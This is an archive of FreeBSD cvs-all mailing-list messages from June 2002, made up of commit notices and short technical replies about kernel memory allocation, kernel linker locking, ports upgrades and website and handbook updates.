Message-Id: <200206192049.g5JKnis94769@freefall.freebsd.org> From: Jeff Roberson Date: Wed, 19 Jun 2002 13:49:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm uma.h uma_core.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeff 2002/06/19 13:49:44 PDT Modified files: sys/vm uma.h uma_core.c Log: - Remove bogus use of kmem_alloc that was inherited from the old zone allocator. - Properly set M_ZERO when talking to the back end page allocators for non malloc zones. This forces us to zero fill pages when they are first brought into a cache. - Properly handle M_ZERO in uma_zalloc_internal. This fixes a problem where per cpu buckets weren't always getting zeroed. Revision Changes Path 1.9 +0 -1 src/sys/vm/uma.h 1.30 +18 -16 src/sys/vm/uma_core.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:52: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.chesapeake.net (chesapeake.net [205.130.220.14]) by hub.freebsd.org (Postfix) with ESMTP id 4563637B40D; Wed, 19 Jun 2002 13:51:52 -0700 (PDT) Received: from localhost (jroberson@localhost) by mail.chesapeake.net (8.11.6/8.11.6) with ESMTP id g5JKppi24897; Wed, 19 Jun 2002 16:51:51 -0400 (EDT) (envelope-from jroberson@chesapeake.net) Date: Wed, 19 Jun 2002 16:51:51 -0400 (EDT) From: Jeff Roberson To: Jeff Roberson Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/vm uma.h uma_core.c In-Reply-To: <200206192049.g5JKnis94769@freefall.freebsd.org> Message-ID: <20020619165107.X54940-100000@mail.chesapeake.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 19 Jun 2002, Jeff Roberson wrote: > jeff 2002/06/19 13:49:44 PDT > > Modified files: > sys/vm uma.h uma_core.c > Log: > - Remove bogus use of kmem_alloc that was inherited from the old zone > allocator. > - Properly set M_ZERO when talking to the back end page allocators for > non malloc zones. This forces us to zero fill pages when they are first > brought into a cache. > - Properly handle M_ZERO in uma_zalloc_internal. This fixes a problem where > per cpu buckets weren't always getting zeroed. > > Revision Changes Path > 1.9 +0 -1 src/sys/vm/uma.h > 1.30 +18 -16 src/sys/vm/uma_core.c > I almost forgot.. Inspired by: tegge To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:52:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F37737B412; Wed, 19 Jun 2002 13:52:42 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKqgv95596; Wed, 19 Jun 2002 13:52:42 -0700 (PDT) (envelope-from bmah) Message-Id: <200206192052.g5JKqgv95596@freefall.freebsd.org> From: "Bruce A. Mah" Date: Wed, 19 Jun 2002 13:52:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/releases/4.6R errata.html X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/19 13:52:42 PDT Modified files: en/releases/4.6R errata.html Log: Regen from article.sgml 1.1.2.69. Revision Changes Path 1.3 +101 -1 www/en/releases/4.6R/errata.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:53:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B7F9737B405; Wed, 19 Jun 2002 13:53:27 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKrRo95700; Wed, 19 Jun 2002 13:53:27 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192053.g5JKrRo95700@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 13:53:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13-fp Makefile distinfo pkg-plist ports/www/apache13-fp/files FreeBSD.layout patch-aa patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 13:53:27 PDT Modified files: www/apache13-fp Makefile distinfo pkg-plist www/apache13-fp/files patch-aa patch-ab Removed files: www/apache13-fp/files FreeBSD.layout Log: upgrade to 1.3.26 PR: 39496 Submitted by: maintainer Revision Changes Path 1.33 +4 -5 ports/www/apache13-fp/Makefile 1.19 +1 -1 ports/www/apache13-fp/distinfo 1.3 +0 -20 ports/www/apache13-fp/files/FreeBSD.layout (dead) 1.9 +4 -8 ports/www/apache13-fp/files/patch-aa 1.15 +2 -19 ports/www/apache13-fp/files/patch-ab 1.21 +60 -20 ports/www/apache13-fp/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 13:55:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B838237B405; Wed, 19 Jun 2002 13:55:25 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JKtPZ96091; Wed, 19 Jun 2002 13:55:25 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192055.g5JKtPZ96091@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 13:55:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/kseg Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 13:55:25 PDT Modified files: math/kseg Makefile Log: replace ${PERL} with ${REINPLACE_CMD} PR: 39498 Submitted by: maintainer Revision Changes Path 1.2 +4 -4 ports/math/kseg/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14: 1:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 01F6637B406; Wed, 19 Jun 2002 14:01:06 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JL15n97058; Wed, 19 Jun 2002 14:01:05 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192101.g5JL15n97058@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 14:01:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11/multi-gnome-terminal Makefile distinfo pkg-plist ports/x11/multi-gnome-terminal/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 14:01:05 PDT Modified files: x11/multi-gnome-terminal Makefile distinfo pkg-plist Removed files: x11/multi-gnome-terminal/files patch-aa Log: upgrade to 1.5.0 PR: 39501 Submitted by: maintainer Revision Changes Path 1.4 +3 -4 ports/x11/multi-gnome-terminal/Makefile 1.3 +1 -1 ports/x11/multi-gnome-terminal/distinfo 1.2 +0 -17 ports/x11/multi-gnome-terminal/files/patch-aa (dead) 1.4 +36 -82 ports/x11/multi-gnome-terminal/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14: 9:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F20D37B412; Wed, 19 Jun 2002 14:09:05 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JL95s01771; Wed, 19 Jun 2002 14:09:05 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206192109.g5JL95s01771@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 14:09:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/kseg Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 14:09:05 PDT Modified files: math/kseg Makefile Log: add USE_REINPLACE= yes Submitted by: pat Revision Changes Path 1.3 +1 -0 ports/math/kseg/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:14:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0639A37B405; Wed, 19 Jun 2002 14:14:45 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLEiH02705; Wed, 19 Jun 2002 14:14:44 -0700 (PDT) (envelope-from marcus) Message-Id: <200206192114.g5JLEiH02705@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 14:14:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.in ports/x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in ports/x11-toolkits/guile-gtk/files patch-Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 14:14:44 PDT Added files: devel/libgtop patch-sysdeps_guile_Makefile.in patch-sysdeps_guile_names_Makefile.in x11-toolkits/guile-gnome/files patch-guile-gnome_Makefile.in x11-toolkits/guile-gtk/files patch-Makefile.in Log: It seems the guile-snarf syntax has changed in 1.4.1. Update ports which use the old syntax. Prompted by: Mike Harding Revision Changes Path 1.1 +11 -0 ports/devel/libgtop/patch-sysdeps_guile_Makefile.in (new) 1.1 +11 -0 ports/devel/libgtop/patch-sysdeps_guile_names_Makefile.in (new) 1.1 +11 -0 ports/x11-toolkits/guile-gnome/files/patch-guile-gnome_Makefile.in (new) 1.1 +11 -0 ports/x11-toolkits/guile-gtk/files/patch-Makefile.in (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:26:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 37DF037B410; Wed, 19 Jun 2002 14:26:00 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLPxu04373; Wed, 19 Jun 2002 14:25:59 -0700 (PDT) (envelope-from arr) Message-Id: <200206192125.g5JLPxu04373@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Wed, 19 Jun 2002 14:25:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern kern_linker.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/19 14:25:59 PDT Modified files: sys/kern kern_linker.c Log: - Remove the lock(9) protecting the kernel linker system. - Added a mutex, kld_mtx, to protect the kernel_linker system. Note that while ``classes'' is global (to that file), it is only read only after SI_SUB_KLD, SI_ORDER_ANY. - Add a SYSINIT to flip a flag that disallows class registration after SI_SUB_KLD, SI_ORDER_ANY. Idea for ``classes'' read only by: jake Reviewed by: jake Revision Changes Path 1.90 +46 -14 src/sys/kern/kern_linker.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:26:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C50C637B41B; Wed, 19 Jun 2002 14:26:25 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLQPe04408; Wed, 19 Jun 2002 14:26:25 -0700 (PDT) (envelope-from marcus) Message-Id: <200206192126.g5JLQPe04408@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 14:26:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/esound Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 14:26:25 PDT Modified files: audio/esound Makefile Log: Add another mirror for esound since it appears there are some GNOME-mirror problems. PR: 39541 Prompted by: many Revision Changes Path 1.37 +2 -1 ports/audio/esound/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:27:34 2002 Delivered-To: cvs-all@freebsd.org Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by hub.freebsd.org (Postfix) with ESMTP id 1167537B406; Wed, 19 Jun 2002 14:26:45 -0700 (PDT) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g5JLQgQC087369 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Wed, 19 Jun 2002 17:26:43 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="koi8-u" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: Dag-Erling Smorgrav , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/pam.d sshd telnetd Date: Wed, 19 Jun 2002 17:26:23 -0400 X-Mailer: KMail [version 1.4] References: <200206192000.g5JK0ix84026@freefall.freebsd.org> In-Reply-To: <200206192000.g5JK0ix84026@freefall.freebsd.org> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206191726.23209.mi+mx@aldan.algebra.com> X-Scanned-By: MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday 19 June 2002 04:00 pm, Dag-Erling Smorgrav wrote: = des 2002/06/19 13:00:44 PDT = = Modified files: = etc/pam.d sshd telnetd = Log: = Enable OPIE for sshd and telnetd. I thought I'd done this a long = time ago... BTW, last I tried, port forwarding was disabled in sshd with no obvious means to re-enable short of recompiling. Can that be fixed too? -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:28:18 2002 Delivered-To: cvs-all@freebsd.org Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by hub.freebsd.org (Postfix) with ESMTP id CFA9537B47B; Wed, 19 Jun 2002 14:27:49 -0700 (PDT) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g5JLRlQC087373 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Wed, 19 Jun 2002 17:27:48 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="koi8-u" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: Ying-Chieh Liao , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/editors Makefile ports/editors/ssed Makefile distinfo pkg-comment pkg-descr pkg-plist ports/editors/ssed/files patch-Makefile.in Date: Wed, 19 Jun 2002 17:27:29 -0400 X-Mailer: KMail [version 1.4] References: <200206192004.g5JK4eC84413@freefall.freebsd.org> In-Reply-To: <200206192004.g5JK4eC84413@freefall.freebsd.org> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206191727.29646.mi+mx@aldan.algebra.com> X-Scanned-By: MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday 19 June 2002 04:04 pm, Ying-Chieh Liao wrote: = Modified files: = editors Makefile = Added files: = editors/ssed Makefile distinfo pkg-comment pkg-descr = pkg-plist = editors/ssed/files patch-Makefile.in = Log: = add ssed 3.58 = Super-sed is a heavily enhanced version of sed Could we have this combined with the "inplace_sed" and get rid of the latter, perhaps? -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:28:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 40D5E37B413; Wed, 19 Jun 2002 14:28:32 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLSW604562; Wed, 19 Jun 2002 14:28:32 -0700 (PDT) (envelope-from arr) Message-Id: <200206192128.g5JLSW604562@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Wed, 19 Jun 2002 14:28:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/smp index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/19 14:28:32 PDT Modified files: en/smp index.sgml Log: - Mark the kernel linker locking task as complete. Revision Changes Path 1.83 +2 -2 www/en/smp/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:31:56 2002 Delivered-To: cvs-all@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 974BF37B408; Wed, 19 Jun 2002 14:31:47 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id D6CA65362; Wed, 19 Jun 2002 23:31:45 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Mikhail Teterin Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/pam.d sshd telnetd References: <200206192000.g5JK0ix84026@freefall.freebsd.org> <200206191726.23209.mi+mx@aldan.algebra.com> From: Dag-Erling Smorgrav Date: 19 Jun 2002 23:31:45 +0200 In-Reply-To: <200206191726.23209.mi+mx@aldan.algebra.com> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Mikhail Teterin writes: > BTW, last I tried, port forwarding was disabled in sshd with no obvious > means to re-enable short of recompiling. Can that be fixed too? Huh? It works just fine here... what are you trying to do that doesn't work? DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:33:10 2002 Delivered-To: cvs-all@freebsd.org Received: from k6.locore.ca (k6.locore.ca [198.96.117.170]) by hub.freebsd.org (Postfix) with ESMTP id 870B437B400; Wed, 19 Jun 2002 14:33:05 -0700 (PDT) Received: from k6.locore.ca (jake@localhost [127.0.0.1]) by k6.locore.ca (8.12.3/8.12.3) with ESMTP id g5JLZADj033553; Wed, 19 Jun 2002 17:35:10 -0400 (EDT) (envelope-from jake@k6.locore.ca) Received: (from jake@localhost) by k6.locore.ca (8.12.3/8.12.3/Submit) id g5JLZ9KF033552; Wed, 19 Jun 2002 17:35:09 -0400 (EDT) Date: Wed, 19 Jun 2002 17:35:09 -0400 From: Jake Burkholder To: Jeff Roberson Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/vm vm_kern.c Message-ID: <20020619173509.B19831@locore.ca> References: <200206192047.g5JKlI394377@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200206192047.g5JKlI394377@freefall.freebsd.org>; from jeff@FreeBSD.org on Wed, Jun 19, 2002 at 01:47:18PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Apparently, On Wed, Jun 19, 2002 at 01:47:18PM -0700, Jeff Roberson said words to the effect of; > jeff 2002/06/19 13:47:18 PDT > > Modified files: > sys/vm vm_kern.c > Log: > Teach kmem_malloc about M_ZERO. Does this assume that the pages actually are zero? vm_page_alloc uses VM_ALLOC_ZERO as a hint, but it may return a garbage filled page if there aren't any zeroed ones; the caller still has to check PG_ZERO. > > Revision Changes Path > 1.79 +10 -4 src/sys/vm/vm_kern.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:40:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1AB7937B40F; Wed, 19 Jun 2002 14:40:13 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLeDe05741; Wed, 19 Jun 2002 14:40:13 -0700 (PDT) (envelope-from arr) Message-Id: <200206192140.g5JLeDe05741@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Wed, 19 Jun 2002 14:40:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/smp index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/19 14:40:13 PDT Modified files: en/smp index.sgml Log: - Meh, this task is not complete. Revision Changes Path 1.84 +2 -2 www/en/smp/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 14:56:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BCAE037B64C; Wed, 19 Jun 2002 14:53:33 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLr0T07320; Wed, 19 Jun 2002 14:53:00 -0700 (PDT) (envelope-from nectar) Message-Id: <200206192153.g5JLr0T07320@freefall.freebsd.org> From: Jacques Vidrine Date: Wed, 19 Jun 2002 14:52:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/security security.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/19 14:52:50 PDT Modified files: en/security security.sgml Log: Add FreeBSD-SN-02:04. Revision Changes Path 1.98 +6 -2 www/en/security/security.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 15:23:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B946537B40E; Wed, 19 Jun 2002 15:23:30 -0700 (PDT) Received: (from scop@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JMNUQ14741; Wed, 19 Jun 2002 15:23:30 -0700 (PDT) (envelope-from scop) Message-Id: <200206192223.g5JMNUQ14741@freefall.freebsd.org> From: Ville Skyttä Date: Wed, 19 Jun 2002 15:23:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/news news.xml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG scop 2002/06/19 15:23:30 PDT Modified files: en/news news.xml Log: Announce myself as a new projects/cvsweb committer. Reviewed by: knu (mentor) Approved by: knu (mentor) Revision Changes Path 1.93 +11 -1 www/en/news/news.xml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 15:27:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F1AE237B428; Wed, 19 Jun 2002 15:27:07 -0700 (PDT) Received: (from scop@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JMR7r15107; Wed, 19 Jun 2002 15:27:07 -0700 (PDT) (envelope-from scop) Message-Id: <200206192227.g5JMR7r15107@freefall.freebsd.org> From: Ville Skyttä Date: Wed, 19 Jun 2002 15:27:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/contributors article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG scop 2002/06/19 15:27:07 PDT Modified files: en_US.ISO8859-1/articles/contributors article.sgml Log: Add myself to committers. Reviewed by: knu (mentor) Approved by: knu (mentor) Revision Changes Path 1.207 +4 -0 doc/en_US.ISO8859-1/articles/contributors/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 15:30:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 70A4737B435; Wed, 19 Jun 2002 15:28:46 -0700 (PDT) Received: (from scop@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JMSk115325; Wed, 19 Jun 2002 15:28:46 -0700 (PDT) (envelope-from scop) Message-Id: <200206192228.g5JMSk115325@freefall.freebsd.org> From: Ville Skyttä Date: Wed, 19 Jun 2002 15:28:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/pgpkeys scop.key X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG scop 2002/06/19 15:28:46 PDT Added files: en_US.ISO8859-1/books/handbook/pgpkeys scop.key Log: Add my key to the handbook. Reviewed by: knu (mentor) Approved by: knu (mentor) Revision Changes Path 1.1 +41 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/scop.key (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with 